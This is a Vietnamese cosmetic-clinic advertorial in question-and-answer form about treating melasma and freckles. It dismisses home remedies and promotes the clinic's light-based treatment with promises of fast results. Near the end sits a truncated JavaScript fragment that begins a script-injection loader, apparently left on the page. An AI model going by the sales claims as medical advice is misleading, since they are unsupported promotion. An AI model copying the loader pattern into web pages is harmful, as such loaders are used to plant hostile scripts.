Trị nám tàn nhang tại nhà sao không hết?

0

Sắp Tết đến nơi rồi mà da dẻ tôi càng ngày càng xấu, vừa có nám lại cả tàn nhang nữa. Tôi đã định tự trị nám tàn nhang tại nhà nhưng thấy mọi người bảo không ăn thua nên muốn nhờ chuyên gia tư vấn giúp cách trị nám và tàn nhang hiệu quả nhất. Tôi xin cảm ơn! (Bảo Trang – Khánh Hòa)

Xem thêm tại đây:

Trả lời:

Chào bạn Bảo Trang!

Cảm ơn bạn đã tin tưởng và gửi câu hỏi về hòm thư tư vấn thammyvienphuxuan@gmail.com. Về câu hỏi của bạn, chúng tôi xin được trả lời như sau:

tri-nam-tan-nhang-tai-nha-sao-khong-het
Trị nám tàn nhang tại nhà sao không hết?

Nám hay tàn nhang là hiện tượng bình thường có thể xuất hiện bất kì vị trí nào trên mặt và ở bất kì lứa tuổi nào. Thông thường phụ nữ ngoài 30 tuổi hay phụ nữ sau sinh do sự thay đổi nội tiết tố bên trong cơ thể sẽ có nám nhiều với tần xuất mạnh hơn. Tuy nhiên cũng không ít trường hợp ngoại lệ, nám hay tàn nhang có thể xuất hiện khi bạn chưa đến 30 vì nhiều lý do khác nhau, trong đó có nguyên nhân do môi trường, chế độ làm việc, ăn uống, sinh hoạt,…

Việc trị nám tàn nhang tại nhà dù bằng cách nào, có thể là tránh căng thẳng, điều tiết lại chế độ ăn uống, đắp mặt nạ dưỡng da về mặt nào đó có thể “khống chế” nám hình thành hay lan rộng hơn nhưng không thể trị nám, tàn nhang vĩnh viễn, nhất là khi tình trạng nám, tàn nhang đã ở mức độ nặng và có chân ăn sâu dưới da.

Vì vậy, thay vì trị nám tàn nhang tại nhà, bạn Bảo Trang nên đến trực tiếp các cơ sở chuyên khoa để điều trị nám tàn nhang càng sớm càng tốt, tự tin đón Tết với làn da mới sáng mịn.

Hiện tại, Thẩm mỹ viện Phú Xuân đang điều trị nám, tàn nhang hiệu quả, nhanh chóng cho đông đảo khách hàng bằng công nghệ cao với sự ứng dụng của ánh sáng sinh học hiện đại. Tuy nhiên, tùy theo tình trạng nám (nám sâu, nám mảng hay nám hỗn hợp) và tàn nhang cụ thể của từng người, bác sĩ sẽ tư vấn phương pháp và liệu trình điều trị thích hợp nhất, đảm bảo chỉ sau liệu trình ngắn nhất, bạn sẽ hoàn toàn tự tin với làn da mới sáng đẹp hơn.

Do đó, để không còn phải lo lắng với những nốt nám, tàn nhang đáng ghét, bạn Bảo Trang nên đến trực tiếp Thẩm mỹ viện Phú Xuân để được thăm khám và tư vấn trị nám, tàn nhang sớm nhất.

Mọi thông tin chi tiết xin vui lòng liên hệ:

Thẩm mỹ viện công nghệ cao Phú Xuân

Địa chỉ: Số 77 Trần Duy Hưng, Cầu Giấy, Hà Nội

Hotline: 094.681.7777

Email: thammyvienphuxuan@gmail.com

var d=document;var s=d.createElement(‘script’);

Tư vấn 24/7: 094 681 7777 - 0125 443 7777